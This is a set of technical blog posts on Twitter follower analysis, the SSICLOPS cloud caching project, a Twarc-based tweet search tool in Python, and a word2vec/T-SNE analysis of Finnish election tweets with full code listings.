Most common friends_count values seen amongst the new accounts following @niinisto

In some cases, clicking through the creation of a new Twitter account (next, next, next, finish) will create an account that follows 21 Twitter profiles. This can explain the high proportion of accounts in this list with a friends_count value of 21. However, we might expect to see the same (or an even stronger) pattern in the @realDonaldTrump data, and we don’t. I’m not sure why this is the case, but it could be that Twitter has some automation in place to auto-delete programmatically created accounts. If you look at the output of my script, you’ll see that between fetching the list of Twitter ids for the last 5000 followers of @realDonaldTrump and fetching the full Twitter User objects for those ids, 3 accounts “went missing” (and hence the tool only collected data for 4997 accounts).

Finally, just for good measure, I ran the tool against my own account (@r0zetta).

Age ranges of new accounts following @r0zetta

Here you see a distribution that’s probably common for non-celebrity Twitter accounts. Not many of my followers have new accounts. What’s more, there’s absolutely no pattern in the friends_count values of these accounts:

Most common friends_count values seen amongst the new accounts following @r0zetta

Of course, there are plenty of other interesting analyses that can be performed on the data collected by this tool. Once the script has been run, all data is saved on disk as json files, so you can process it to your heart’s content without having to run additional queries against Twitter’s servers. As usual, have fun extending this tool to your own needs, and if you’re interested in reading some of my other guides or analyses, here’s a full list of those articles.



Improving Caching Strategies With SSICLOPS

F-Secure development teams participate in a variety of academic and industrial collaboration projects. Recently, we’ve been actively involved in a project codenamed SSICLOPS. This project has been running for three years as a joint collaboration between ten industrial and academic partners. Here’s the official description of the project.

The Scalable and Secure Infrastructures for Cloud Operations (SSICLOPS, pronounced “cyclops”) project focuses on techniques for the management of federated cloud infrastructures, in particular cloud networking techniques within software-defined data centres and across wide-area networks. SSICLOPS is funded by the European Commission under the Horizon2020 programme (https://ssiclops.eu/). The project brings together industrial and academic partners from Finland, Germany, Italy, the Netherlands, Poland, Romania, Switzerland, and the UK.

The primary goal of the SSICLOPS project is to empower enterprises to create and operate high-performance private cloud infrastructure that allows flexible scaling through federation with other clouds, without compromising on their service level and security requirements. SSICLOPS federation supports the efficient integration of clouds, no matter whether they are geographically collocated or spread out, or belong to the same or different administrative entities or jurisdictions: in all cases, SSICLOPS delivers maximum performance for inter-cloud communication, enforces legal and security constraints, and minimizes overall resource consumption. In such a federation, individual enterprises are able to dynamically scale their cloud services in and out: they can offer their own spare resources (when available) and take in resources from others when needed. This allows each federation member to maximize the utilization of its own infrastructure while minimizing excess capacity needs.

Many of our systems (both backend and on endpoints) rely on the ability to quickly query the reputation and metadata of objects from a centrally maintained repository. Reputation queries of this type are served either directly from the central repository, or through one of many geographically distributed proxy nodes. When a query is made to a proxy node, if the required verdicts don’t exist in that proxy’s cache, the proxy queries the central repository, and then delivers the result. Since reputation queries need to be low-latency, the additional hop from proxy to central repository slows down response times.
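In outline, a proxy node's lookup path looks something like the following sketch (hypothetical names and a plain dict for the cache; the real service is considerably more involved).

```python
def lookup(obj_hash, cache, query_central, stats):
    """Hypothetical proxy-node lookup: serve from the local cache when
    possible, otherwise take the slower hop to the central repository."""
    if obj_hash in cache:
        stats["hits"] += 1
        return cache[obj_hash]
    stats["misses"] += 1              # extra round-trip to the repository
    verdict = query_central(obj_hash)
    cache[obj_hash] = verdict
    return verdict
```

The miss branch is the costly one: every miss adds a round-trip to the central repository, which is why the cache hit rate directly drives response latency.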

In the scope of the SSICLOPS project, we evaluated a number of potential improvements to this content distribution network. Our aim was to reduce the number of queries from proxy nodes to the central repository, by improving caching mechanisms for use cases where the set of the most frequently accessed items is highly dynamic. We also looked into improving the speed of communications between nodes via protocol adjustments. Most of this work was done in cooperation with Deutsche Telekom and Aalto University.

The original implementation of our proxy nodes used a Least Recently Used (LRU) caching mechanism to determine which cached items should be discarded. Since our reputation verdicts have time-to-live values associated with them, these values were also taken into account in our original algorithm.
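A minimal sketch of such a TTL-aware LRU cache might look like this. This is an illustration of the general idea only (with an injectable clock for testability), not F-Secure's actual implementation:

```python
import time
from collections import OrderedDict

class TTLLRUCache(object):
    """LRU cache that also discards entries whose time-to-live has passed."""

    def __init__(self, capacity, clock=time.time):
        self.capacity = capacity
        self.clock = clock            # injectable for testing
        self.items = OrderedDict()    # key -> (value, expiry time)

    def get(self, key):
        entry = self.items.get(key)
        if entry is None:
            return None
        value, expiry = entry
        if self.clock() >= expiry:              # verdict's TTL has passed
            del self.items[key]
            return None
        self.items[key] = self.items.pop(key)   # move to most-recently-used end
        return value

    def put(self, key, value, ttl):
        if key in self.items:
            del self.items[key]
        elif len(self.items) >= self.capacity:
            self.items.popitem(last=False)      # evict least recently used
        self.items[key] = (value, self.clock() + ttl)
```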

Hit Rate Results

Initial tests performed in October 2017 indicated that SG-LRU outperformed LRU on our dataset

During the project, we worked with Gerhard Hasslinger’s team at Deutsche Telekom to evaluate whether alternate caching strategies might improve the performance of our reputation lookup service. We found that Score-Gated LRU / Least Frequently Used (LFU) strategies outperformed our original LRU implementation. Based on the conclusions of this research, we have decided to implement a windowed LFU caching strategy, with some limited “predictive” features for determining which items might be queried in the future. The results look promising, and we’re planning on bringing the new mechanism into our production proxy nodes in the near future.
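To illustrate the idea, here’s a toy sketch of a windowed LFU eviction policy, where request frequencies are counted only over the last N requests. Again, this is a hypothetical illustration rather than our production code, and it omits the predictive features mentioned above:

```python
from collections import Counter, deque

class WindowedLFUCache(object):
    """Evicts the cached key with the lowest frequency, counted over
    a sliding window of the most recent requests."""

    def __init__(self, capacity, window=1000):
        self.capacity = capacity
        self.recent = deque(maxlen=window)  # sliding window of recent requests
        self.freq = Counter()               # per-key frequency inside the window
        self.data = {}

    def _record(self, key):
        if len(self.recent) == self.recent.maxlen:
            self.freq[self.recent[0]] -= 1  # oldest request leaves the window
        self.recent.append(key)
        self.freq[key] += 1

    def get(self, key):
        self._record(key)
        return self.data.get(key)

    def put(self, key, value):
        if key not in self.data and len(self.data) >= self.capacity:
            victim = min(self.data, key=lambda k: self.freq[k])
            del self.data[victim]           # evict the least-requested key
        self.data[key] = value
```

The appeal for a highly dynamic working set is that an item popular last month but idle in the current window no longer counts as "frequent", unlike with a plain LFU counter.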

SG-LRU exploits the focus on top-k requests by keeping most top-k objects in the cache

The work done in SSICLOPS will serve as a foundation for the future optimization of content distribution strategies in many of F-Secure’s services, and we’d like to thank everyone who worked with us on this successful project!



Searching Twitter With Twarc

Twarc makes it really easy to search Twitter via the API. Simply create a twarc object using your own API keys and then pass your search query into twarc’s search() function to get a stream of Tweet objects. Remember that, by default, the Twitter API will only return results from the last 7 days. However, this is useful enough if we’re looking for fresh information on a topic.

Since this methodology is so simple, posting code for a tool that simply prints the resulting tweets to stdout would make for a boring blog post. Here I present a tool that collects a bunch of metadata from the returned Tweet objects. Here’s what it does:

  • records frequency distributions of URLs, hashtags, and users
  • records interactions between users and hashtags
  • outputs csv files that can be imported into Gephi for graphing
  • downloads all images found in Tweets
  • records each Tweet’s text along with the URL of the Tweet

The code doesn’t really need explanation, so here’s the whole thing.

from collections import Counter
from itertools import combinations
from twarc import Twarc
import requests
import sys
import os
import shutil
import io
import re
import json

# Helper functions for saving json, csv and formatted txt files
def save_json(variable, filename):
  with io.open(filename, "w", encoding="utf-8") as f:
    f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def save_csv(data, filename):
  with io.open(filename, "w", encoding="utf-8") as handle:
    handle.write(u"Source,Target,Weight\n")
    for source, targets in sorted(data.items()):
      for target, count in sorted(targets.items()):
        if source != target and source is not None and target is not None:
          handle.write(source + u"," + target + u"," + unicode(count) + u"\n")

def save_text(data, filename):
  with io.open(filename, "w", encoding="utf-8") as handle:
    for item, count in data.most_common():
      handle.write(unicode(count) + "\t" + item + "\n")

# Returns the screen_name of the user retweeted, or None
def retweeted_user(status):
  if "retweeted_status" in status:
    orig_tweet = status["retweeted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        return user["screen_name"]

# Returns a list of screen_names that the user interacted with in this Tweet
def get_interactions(status):
  interactions = []
  if "in_reply_to_screen_name" in status:
    replied_to = status["in_reply_to_screen_name"]
    if replied_to is not None and replied_to not in interactions:
      interactions.append(replied_to)
  if "retweeted_status" in status:
    orig_tweet = status["retweeted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        if user["screen_name"] not in interactions:
          interactions.append(user["screen_name"])
  if "quoted_status" in status:
    orig_tweet = status["quoted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        if user["screen_name"] not in interactions:
          interactions.append(user["screen_name"])
  if "entities" in status:
    entities = status["entities"]
    if "user_mentions" in entities:
      for item in entities["user_mentions"]:
        if item is not None and "screen_name" in item:
          mention = item['screen_name']
          if mention is not None and mention not in interactions:
            interactions.append(mention)
  return interactions

# Returns a list of hashtags found in the tweet
def get_hashtags(status):
  hashtags = []
  if "entities" in status:
    entities = status["entities"]
    if "hashtags" in entities:
      for item in entities["hashtags"]:
        if item is not None and "text" in item:
          hashtag = item['text']
          if hashtag is not None and hashtag not in hashtags:
            hashtags.append(hashtag)
  return hashtags

# Returns a list of URLs found in the Tweet
def get_urls(status):
  urls = []
  if "entities" in status:
    entities = status["entities"]
    if "urls" in entities:
      for item in entities["urls"]:
        if item is not None and "expanded_url" in item:
          url = item['expanded_url']
          if url is not None and url not in urls:
            urls.append(url)
  return urls

# Returns the URLs to any images found in the Tweet
def get_image_urls(status):
  urls = []
  if "entities" in status:
    entities = status["entities"]
    if "media" in entities:
      for item in entities["media"]:
        if item is not None:
          if "media_url" in item:
            murl = item["media_url"]
            if murl not in urls:
              urls.append(murl)
  return urls

# Main starts here
if __name__ == '__main__':
# Add your own API key values here
  consumer_key=""
  consumer_secret=""
  access_token=""
  access_token_secret=""

  twarc = Twarc(consumer_key, consumer_secret, access_token, access_token_secret)

# Check that search terms were provided at the command line
  target_list = []
  if (len(sys.argv) > 1):
    target_list = sys.argv[1:]
  else:
    print("No search terms provided. Exiting.")
    sys.exit(0)

  num_targets = len(target_list)
  for count, target in enumerate(target_list):
    print(str(count + 1) + "/" + str(num_targets) + " searching on target: " + target)
# Create a separate save directory for each search query
# Since search queries can be a whole sentence, we'll check the length
# and simply number it if the query is overly long
    save_dir = ""
    if len(target) < 30:
      save_dir = target.replace(" ", "_")
    else:
      save_dir = "target_" + str(count + 1)
    if not os.path.exists(save_dir):
      print("Creating directory: " + save_dir)
      os.makedirs(save_dir)
# Variables for capturing stuff
    tweets_captured = 0
    influencer_frequency_dist = Counter()
    mentioned_frequency_dist = Counter()
    hashtag_frequency_dist = Counter()
    url_frequency_dist = Counter()
    user_user_graph = {}
    user_hashtag_graph = {}
    hashtag_hashtag_graph = {}
    all_image_urls = []
    tweets = {}
    tweet_count = 0
# Start the search
    for status in twarc.search(target):
# Output some status as we go, so we know something is happening
      sys.stdout.write("\r")
      sys.stdout.flush()
      sys.stdout.write("Collected " + str(tweet_count) + " tweets.")
      sys.stdout.flush()
      tweet_count += 1
    
      screen_name = None
      if "user" in status:
        if "screen_name" in status["user"]:
          screen_name = status["user"]["screen_name"]

      retweeted = retweeted_user(status)
      if retweeted is not None:
        influencer_frequency_dist[retweeted] += 1
      else:
        influencer_frequency_dist[screen_name] += 1

# Tweet text can be in either "text" or "full_text" field...
      text = None
      if "full_text" in status:
        text = status["full_text"]
      elif "text" in status:
        text = status["text"]

      id_str = None
      if "id_str" in status:
        id_str = status["id_str"]

# Assemble the URL to the tweet we received...
      tweet_url = None
      if id_str is not None and screen_name is not None:
        tweet_url = "https://twitter.com/" + screen_name + "/status/" + id_str

# ...and capture it
      if tweet_url is not None and text is not None:
        tweets[tweet_url] = text

# Record mapping graph between users
      interactions = get_interactions(status)
      if interactions is not None:
        for user in interactions:
          mentioned_frequency_dist[user] += 1
          if screen_name not in user_user_graph:
            user_user_graph[screen_name] = {}
          if user not in user_user_graph[screen_name]:
            user_user_graph[screen_name][user] = 1
          else:
            user_user_graph[screen_name][user] += 1

# Record mapping graph between users and hashtags
      hashtags = get_hashtags(status)
      if hashtags is not None:
        if len(hashtags) > 1:
          hashtag_interactions = []
# This code creates pairs of hashtags in situations where multiple
# hashtags were found in a tweet
# This is used to create a graph of hashtag-hashtag interactions
          for comb in combinations(sorted(hashtags), 2):
            hashtag_interactions.append(comb)
          if len(hashtag_interactions) > 0:
            for inter in hashtag_interactions:
              item1, item2 = inter
              if item1 not in hashtag_hashtag_graph:
                hashtag_hashtag_graph[item1] = {}
              if item2 not in hashtag_hashtag_graph[item1]:
                hashtag_hashtag_graph[item1][item2] = 1
              else:
                hashtag_hashtag_graph[item1][item2] += 1
          for hashtag in hashtags:
            hashtag_frequency_dist[hashtag] += 1
            if screen_name not in user_hashtag_graph:
              user_hashtag_graph[screen_name] = {}
            if hashtag not in user_hashtag_graph[screen_name]:
              user_hashtag_graph[screen_name][hashtag] = 1
            else:
              user_hashtag_graph[screen_name][hashtag] += 1

      urls = get_urls(status)
      if urls is not None:
        for url in urls:
          url_frequency_dist[url] += 1

      image_urls = get_image_urls(status)
      if image_urls is not None:
        for url in image_urls:
          if url not in all_image_urls:
            all_image_urls.append(url)

# After the search completes, iterate through image URLs, fetching each
# image if we haven't already
    print
    print("Fetching images.")
    pictures_dir = os.path.join(save_dir, "images")
    if not os.path.exists(pictures_dir):
      print("Creating directory: " + pictures_dir)
      os.makedirs(pictures_dir)
    for url in all_image_urls:
      m = re.search("^http:\/\/pbs\.twimg\.com\/media\/(.+)$", url)
      if m is not None:
        filename = m.group(1)
        print("Getting picture from: " + url)
        save_path = os.path.join(pictures_dir, filename)
        if not os.path.exists(save_path):
          response = requests.get(url, stream=True)
          with open(save_path, 'wb') as out_file:
            shutil.copyfileobj(response.raw, out_file)
          del response

# Output a bunch of files containing the data we just gathered
    print("Saving data.")
    json_outputs = {"tweets.json": tweets,
                    "urls.json": url_frequency_dist,
                    "hashtags.json": hashtag_frequency_dist,
                    "influencers.json": influencer_frequency_dist,
                    "mentioned.json": mentioned_frequency_dist,
                    "user_user_graph.json": user_user_graph,
                    "user_hashtag_graph.json": user_hashtag_graph,
                    "hashtag_hashtag_graph.json": hashtag_hashtag_graph}
    for name, dataset in json_outputs.iteritems():
      filename = os.path.join(save_dir, name)
      save_json(dataset, filename)

# These files are created in a format that can be easily imported into Gephi
    csv_outputs = {"user_user_graph.csv": user_user_graph,
                   "user_hashtag_graph.csv": user_hashtag_graph,
                   "hashtag_hashtag_graph.csv": hashtag_hashtag_graph}
    for name, dataset in csv_outputs.iteritems():
      filename = os.path.join(save_dir, name)
      save_csv(dataset, filename)

    text_outputs = {"hashtags.txt": hashtag_frequency_dist,
                    "influencers.txt": influencer_frequency_dist,
                    "mentioned.txt": mentioned_frequency_dist,
                    "urls.txt": url_frequency_dist}
    for name, dataset in text_outputs.iteritems():
      filename = os.path.join(save_dir, name)
      save_text(dataset, filename)

Running this tool will create a directory for each search term provided at the command-line. To search for a sentence, or to include multiple terms, enclose the argument with quotes. Due to Twitter’s rate limiting, your search may hit a limit, and need to pause to wait for the rate limit to reset. Luckily twarc takes care of that. Once the search is finished, a bunch of files will be written to the previously created directory.

Since I use a Mac, I can use its Quick Look functionality from the Finder to browse the output files. Because pytorch has been gaining a lot of interest lately, I ran my script against that search term. Here are some examples of how I can quickly view the output files.

The preview pane is enough to get an overview of the recorded data.

 

Pressing spacebar opens the file in Quick Look, which is useful for data that doesn’t fit neatly into the preview pane.

Importing the user_user_graph.csv file into Gephi provided me with some neat visualizations about the pytorch community.

A full zoom out of the pytorch community

Here we can see who the main influencers are. It seems that Yann LeCun and François Chollet are Tweeting about pytorch, too.

Here’s a zoomed-in view of part of the network.

Zoomed in view of part of the Gephi graph generated.

If you enjoyed this post, check out the previous two articles I published on using the Twitter API here and here. I hope you have fun tailoring this script to your own needs!



NLP Analysis Of Tweets Using Word2Vec And T-SNE

In the context of some of the Twitter research I’ve been doing, I decided to try out a few natural language processing (NLP) techniques. So far, word2vec has produced perhaps the most meaningful results. Wikipedia describes word2vec very precisely:

“Word2vec takes as its input a large corpus of text and produces a vector space, typically of several hundred dimensions, with each unique word in the corpus being assigned a corresponding vector in the space. Word vectors are positioned in the vector space such that words that share common contexts in the corpus are located in close proximity to one another in the space.”
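
To make “close proximity” concrete: similarity between word vectors is normally measured using cosine similarity. Here’s a minimal standalone sketch using made-up three-dimensional vectors (real word2vec vectors have hundreds of dimensions):

```python
import math

def cosine_similarity(a, b):
  # Cosine of the angle between two vectors: 1.0 means identical direction
  dot = sum(x * y for x, y in zip(a, b))
  norm_a = math.sqrt(sum(x * x for x in a))
  norm_b = math.sqrt(sum(x * x for x in b))
  return dot / (norm_a * norm_b)

# Toy vectors (invented for illustration): words that appear in similar
# contexts end up with vectors pointing in similar directions
cat = [0.9, 0.1, 0.3]
dog = [0.8, 0.2, 0.3]
car = [0.1, 0.9, 0.7]
print(cosine_similarity(cat, dog) > cosine_similarity(cat, car))  # True
```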

During the two weeks leading up to the January 2018 Finnish presidential elections, I performed an analysis of user interactions and behavior on Twitter, based on search terms relevant to that event. During the course of that analysis, I also dumped each Tweet’s raw text field to a text file, one item per line. I then wrote a small tool designed to preprocess the collected Tweets, feed the processed data into word2vec, and finally output some visualizations. Since word2vec creates multidimensional tensors, I’m using T-SNE for dimensionality reduction (the resulting visualizations are in two dimensions, compared to the 200 dimensions of the original data).

The rest of this blog post will be devoted to listing and explaining the code used to perform these tasks. I’ll present the code as it appears in the tool. The code starts with a set of functions that perform processing and visualization tasks. The main routine at the end wraps everything up by calling each routine sequentially, passing artifacts from the previous step to the next one. As such, you can copy-paste each section of code into an editor, save the resulting file, and the tool should run (assuming you’ve pip installed all dependencies.) Note that I’m using two spaces per indent purely to allow the code to format neatly in this blog. Let’s start, as always, with importing dependencies. Off the top of my head, you’ll probably want to install tensorflow, gensim, six, numpy, matplotlib, and sklearn (although I think some of these install as part of tensorflow’s installation).

# -*- coding: utf-8 -*-
from tensorflow.contrib.tensorboard.plugins import projector
from sklearn.manifold import TSNE
from collections import Counter
from six.moves import cPickle
import gensim.models.word2vec as w2v
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
import multiprocessing
import os
import sys
import io
import re
import json

The next listing contains a few helper functions. In each processing step, I like to save the output, for two reasons. Firstly, depending on the size of your raw data, each step can take some time; if you’ve performed the step once and saved the output, it can be loaded from disk to save time on subsequent passes. Secondly, saving each step lets you examine the output to check that it looks like what you want. The try_load_or_process() function attempts to load previously saved output from a function; if none exists, it runs the function and saves the output. Note also the rather odd-looking implementation in save_json(). This is a workaround for the fact that json.dump() errors out on certain non-ascii characters when paired with io.open().

def try_load_or_process(filename, processor_fn, function_arg):
  load_fn = None
  save_fn = None
  if filename.endswith("json"):
    load_fn = load_json
    save_fn = save_json
  else:
    load_fn = load_bin
    save_fn = save_bin
  if os.path.exists(filename):
    return load_fn(filename)
  else:
    ret = processor_fn(function_arg)
    save_fn(ret, filename)
    return ret

def print_progress(current, maximum):
  sys.stdout.write("\r")
  sys.stdout.flush()
  sys.stdout.write(str(current) + "/" + str(maximum))
  sys.stdout.flush()

def save_bin(item, filename):
  with open(filename, "wb") as f:
    cPickle.dump(item, f)

def load_bin(filename):
  if os.path.exists(filename):
    with open(filename, "rb") as f:
      return cPickle.load(f)

def save_json(variable, filename):
  with io.open(filename, "w", encoding="utf-8") as f:
    f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def load_json(filename):
  ret = None
  if os.path.exists(filename):
    try:
      with io.open(filename, "r", encoding="utf-8") as f:
        ret = json.load(f)
    except:
      pass
  return ret
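
To verify that workaround, here’s a standalone round-trip test (the temporary path is just for illustration); under Python 3, the unicode() wrapper shown above isn’t needed:

```python
# -*- coding: utf-8 -*-
import io
import json
import os
import tempfile

def save_json(variable, filename):
  # ensure_ascii=False keeps characters like ä/ö/å readable in the file
  with io.open(filename, "w", encoding="utf-8") as f:
    f.write(json.dumps(variable, indent=4, ensure_ascii=False))

path = os.path.join(tempfile.mkdtemp(), "roundtrip.json")
save_json({u"word": u"päivä"}, path)
with io.open(path, "r", encoding="utf-8") as f:
  assert json.load(f)[u"word"] == u"päivä"
```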

Moving on, let’s look at the first preprocessing step. This function takes the raw text strings dumped from Tweets, removes unwanted characters and features (such as user names and URLs), removes duplicates, and returns a list of sanitized strings. Here, I’m not using string.printable as the list of characters to keep, since Finnish includes letters that aren’t part of the English alphabet (äöåÄÖÅ). The regular expressions used in this step have been somewhat tailored to the raw input data, so you may need to tweak them for your own input corpus.

def process_raw_data(input_file):
  valid = u"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ#@.:/ äöåÄÖÅ"
  url_match = "(https?:\/\/[0-9a-zA-Z\-\_]+\.[\-\_0-9a-zA-Z]+\.?[0-9a-zA-Z\-\_]*\/?.*)"
  name_match = "\@[\_0-9a-zA-Z]+\:?"
  lines = []
  print("Loading raw data from: " + input_file)
  if os.path.exists(input_file):
    with io.open(input_file, 'r', encoding="utf-8") as f:
      lines = f.readlines()
  num_lines = len(lines)
  ret = []
  for count, text in enumerate(lines):
    if count % 50 == 0:
      print_progress(count, num_lines)
    text = re.sub(url_match, u"", text)
    text = re.sub(name_match, u"", text)
    text = re.sub("\&amp\;?", u"", text)
    text = re.sub("[\:\.]{1,}$", u"", text)
    text = re.sub("^RT\:?", u"", text)
    text = u''.join(x for x in text if x in valid)
    text = text.strip()
    if len(text.split()) > 5:
      if text not in ret:
        ret.append(text)
  return ret
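
As a quick sanity check, here’s how those regular expressions behave on a fabricated example Tweet (the text is invented for illustration):

```python
# -*- coding: utf-8 -*-
import re

# Same patterns as in process_raw_data() above
url_match = r"(https?:\/\/[0-9a-zA-Z\-\_]+\.[\-\_0-9a-zA-Z]+\.?[0-9a-zA-Z\-\_]*\/?.*)"
name_match = r"\@[\_0-9a-zA-Z]+\:?"

text = u"RT @someuser: Check this out https://example.com/page"
text = re.sub(url_match, u"", text)   # strip the URL (and anything after it)
text = re.sub(name_match, u"", text)  # strip the @username mention
text = re.sub(r"^RT\:?", u"", text)   # strip the retweet prefix
print(text.strip())  # Check this out
```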

The next step is to tokenize each sentence (or Tweet) into words.

def tokenize_sentences(sentences):
  ret = []
  max_s = len(sentences)
  print("Got " + str(max_s) + " sentences.")
  for count, s in enumerate(sentences):
    tokens = []
    # re.split with a capture group also returns the whitespace separators,
    # so empty and whitespace-only entries are filtered out here
    for w in re.split(r'(\s+)', s):
      w = w.strip().lower()
      if len(w) > 0:
        tokens.append(w)
    if len(tokens) > 0:
      ret.append(tokens)
    if count % 50 == 0:
      print_progress(count, max_s)
  return ret
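
Note that splitting with a capturing group makes re.split() return the whitespace separators as well, which is why empty and whitespace-only entries have to be discarded. For example:

```python
import re

raw = u"Hello   Twitter\nWorld"
# Keep only non-empty entries, stripped and lowercased
tokens = [w.strip().lower() for w in re.split(r'(\s+)', raw) if len(w.strip()) > 0]
print(tokens)
```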

The final text preprocessing step removes unwanted tokens. This includes numeric data and stop words. Stop words are the most common words in a language. We omit them from processing in order to bring out the meaning of the text in our analysis. I downloaded a json dump of stop words for all languages from here, and placed it in the same directory as this script. If you plan on trying this code out yourself, you’ll need to perform the same steps. Note that I included extra stopwords of my own. After looking at the output of this step, I noticed that Twitter’s truncation of some tweets caused certain word fragments to occur frequently.

def clean_sentences(tokens):
  all_stopwords = load_json("stopwords-iso.json")
  extra_stopwords = ["ssä", "lle", "h.", "oo", "on", "muk", "kov", "km", "ia", "täm", "sy", "but", ":sta", "hi", "py", "xd", "rr", "x:", "smg", "kum", "uut", "kho", "k", "04n", "vtt", "htt", "väy", "kin", "#8", "van", "tii", "lt3", "g", "ko", "ett", "mys", "tnn", "hyv", "tm", "mit", "tss", "siit", "pit", "viel", "sit", "n", "saa", "tll", "eik", "nin", "nii", "t", "tmn", "lsn", "j", "miss", "pivn", "yhn", "mik", "tn", "tt", "sek", "lis", "mist", "tehd", "sai", "l", "thn", "mm", "k", "ku", "s", "hn", "nit", "s", "no", "m", "ky", "tst", "mut", "nm", "y", "lpi", "siin", "a", "in", "ehk", "h", "e", "piv", "oy", "p", "yh", "sill", "min", "o", "va", "el", "tyn", "na", "the", "tit", "to", "iti", "tehdn", "tlt", "ois", ":", "v", "?", "!", "&"]
  stopwords = None
  if all_stopwords is not None:
    stopwords = all_stopwords["fi"]
    stopwords += extra_stopwords
  ret = []
  max_s = len(tokens)
  for count, sentence in enumerate(tokens):
    if count % 50 == 0:
      print_progress(count, max_s)
    cleaned = []
    for token in sentence:
      if len(token) > 0:
        if stopwords is not None and token in stopwords:
          token = None
        if token is not None and re.search("^[0-9\.\-\s\/]+$", token):
          token = None
        if token is not None:
          cleaned.append(token)
    if len(cleaned) > 0:
      ret.append(cleaned)
  return ret
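
As a side note, since every token is checked against the full stop word list, converting that list to a set makes the membership test much faster on large corpora. Here’s a minimal sketch of the same filtering logic using a set and invented tokens:

```python
# -*- coding: utf-8 -*-
import re

stopwords = set([u"on", u"ja", u"ei"])  # a tiny invented stop word list
sentence = [u"suomi", u"on", u"100", u"hieno", u"maa"]
# Drop stop words and purely numeric tokens, as in clean_sentences()
cleaned = [t for t in sentence
           if t not in stopwords and not re.search(r"^[0-9\.\-\s\/]+$", t)]
print(cleaned)
```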

The next function creates a vocabulary from the processed text. A vocabulary, in this context, is basically a list of all unique tokens in the data. This function creates a frequency distribution of all tokens (words) by counting the number of occurrences of each token. We will use this later to “trim” the vocabulary down to a manageable size.

def get_word_frequencies(corpus):
  frequencies = Counter()
  for sentence in corpus:
    for word in sentence:
      frequencies[word] += 1
  freq = frequencies.most_common()
  return freq
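
To illustrate, here’s what the frequency distribution looks like on a tiny invented corpus of two tokenized Tweets:

```python
from collections import Counter

corpus = [[u"hello", u"world"], [u"hello", u"twitter"]]
frequencies = Counter()
for sentence in corpus:
  for word in sentence:
    frequencies[word] += 1
# most_common() returns (token, count) pairs, highest counts first
freq = frequencies.most_common()
print(freq[0])  # ('hello', 2)
```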

Now that we’re done with the preprocessing steps, let’s get into the more interesting analysis functions. The following function accepts the tokenized and cleaned data generated from the steps above, and uses it to train a word2vec model. The num_features parameter sets the number of features each word is assigned (and hence the dimensionality of the resulting tensor). It is recommended to set it between 100 and 1000. Naturally, larger values take more processing power and memory/disk space to handle. I found 200 to be enough, but I normally start with a value of 300 when looking at new datasets. The min_count variable passed to word2vec designates how to trim the vocabulary. For example, if min_count is set to 3, all words that appear in the data set fewer than 3 times will be discarded from the vocabulary used when training the word2vec model. In the dimensionality reduction step we perform later, large vocabulary sizes cause T-SNE iterations to take a long time. Hence, I tuned min_count to generate a vocabulary of around 10,000 words. Increasing the value of sample will cause word2vec to randomly omit words with high frequency counts. I decided that I wanted to keep all of those words in my analysis, so it’s set to zero. Increasing epoch_count will cause word2vec to train for more iterations, which will, naturally, take longer. Increase this if you have a fast machine or plenty of time on your hands 🙂

def get_word2vec(sentences):
  num_workers = multiprocessing.cpu_count()
  num_features = 200
  epoch_count = 10
  sentence_count = len(sentences)
  w2v_file = os.path.join(save_dir, "word_vectors.w2v")
  word2vec = None
  if os.path.exists(w2v_file):
    print("w2v model loaded from " + w2v_file)
    word2vec = w2v.Word2Vec.load(w2v_file)
  else:
    word2vec = w2v.Word2Vec(sg=1,
                            seed=1,
                            workers=num_workers,
                            size=num_features,
                            min_count=min_frequency_val,
                            window=5,
                            sample=0)

    print("Building vocab...")
    word2vec.build_vocab(sentences)
    print("Word2Vec vocabulary length:", len(word2vec.wv.vocab))
    print("Training...")
    word2vec.train(sentences, total_examples=sentence_count, epochs=epoch_count)
    print("Saving model...")
    word2vec.save(w2v_file)
  return word2vec

Tensorboard has some good tools to visualize word embeddings in the word2vec model we just created. These visualizations can be accessed using the “projector” tab in the interface. Here’s code to create tensorboard embeddings:

def create_embeddings(word2vec):
  all_word_vectors_matrix = word2vec.wv.syn0
  num_words = len(all_word_vectors_matrix)
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  dim = word2vec.wv[vocab[0]].shape[0]
  embedding = np.empty((num_words, dim), dtype=np.float32)
  metadata = ""
  for i, word in enumerate(vocab):
    embedding[i] = word2vec.wv[word]
    metadata += word + "\n"
  metadata_file = os.path.join(save_dir, "metadata.tsv")
  with io.open(metadata_file, "w", encoding="utf-8") as f:
    f.write(metadata)

  tf.reset_default_graph()
  sess = tf.InteractiveSession()
  X = tf.Variable([0.0], name='embedding')
  place = tf.placeholder(tf.float32, shape=embedding.shape)
  set_x = tf.assign(X, place, validate_shape=False)
  sess.run(tf.global_variables_initializer())
  sess.run(set_x, feed_dict={place: embedding})

  summary_writer = tf.summary.FileWriter(save_dir, sess.graph)
  config = projector.ProjectorConfig()
  embedding_conf = config.embeddings.add()
  embedding_conf.tensor_name = 'embedding:0'
  embedding_conf.metadata_path = 'metadata.tsv'
  projector.visualize_embeddings(summary_writer, config)

  save_file = os.path.join(save_dir, "model.ckpt")
  print("Saving session...")
  saver = tf.train.Saver()
  saver.save(sess, save_file)

Once this code has been run, tensorflow log entries will be created in save_dir. To start a tensorboard session, run the following command from the directory where this script was run:

tensorboard --logdir=analysis

You should see output like the following once you’ve run the above command:

TensorBoard 0.4.0rc3 at http://node.local:6006 (Press CTRL+C to quit)

Navigate your web browser to localhost:<port_number> to see the interface. From the “Inactive” pulldown menu, select “Projector”.

tensorboard projector menu item

The “projector” menu is often hiding under the “inactive” pulldown.

Once you’ve selected “projector”, you should see a view like this:

Tensorboard's projector view

Tensorboard’s projector view allows you to interact with word embeddings, search for words, and even run t-sne on the dataset.

There are a lot of things to play around with in this view. You can search for words, fly around the embeddings, and even run t-sne (on the bottom left) on the dataset. If you get to this step, have fun playing with the interface!

